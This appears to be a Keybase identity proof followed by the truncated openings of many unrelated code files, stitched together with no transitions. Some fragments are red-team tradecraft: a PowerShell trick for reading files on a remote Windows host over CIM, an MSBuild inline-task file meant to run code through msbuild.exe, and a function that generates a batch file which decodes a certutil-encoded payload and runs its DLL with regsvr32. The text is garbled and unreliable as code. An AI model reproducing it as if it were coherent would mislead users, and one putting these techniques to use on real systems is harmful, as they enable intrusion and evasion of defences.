I hereby claim:
- I am xorrior on github.
- I am xorrior (https://keybase.io/xorrior) on keybase.
- I have a public key whose fingerprint is A086 24A4 D702 0EAE FCEC 139D 56BA 7C93 A848 D2F7
To claim this, I am signing this object:
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#import "NSObject.h"
#import "SMSystem_FileManagerProtocol.h"
//<SMSystem_FileManagerProtocol>
@class NSObject, SMMigrationRequest;
//
// demoClass.m
// testExampleBundle
//
// Created by Chris Ross on 4/17/18.
// Copyright © 2018 Void. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <objc/objc.h>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
</PropertyGroup>
<Target Name="Hello">
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>sample rule</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
function New-CplBatchFile
{
<#
.SYNOPSIS
Generates a batch file which will contain a certutil encoded, cab compressed payload.
.DESCRIPTION
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('FullName')]
[String]
[ValidateNotNullOrEmpty()]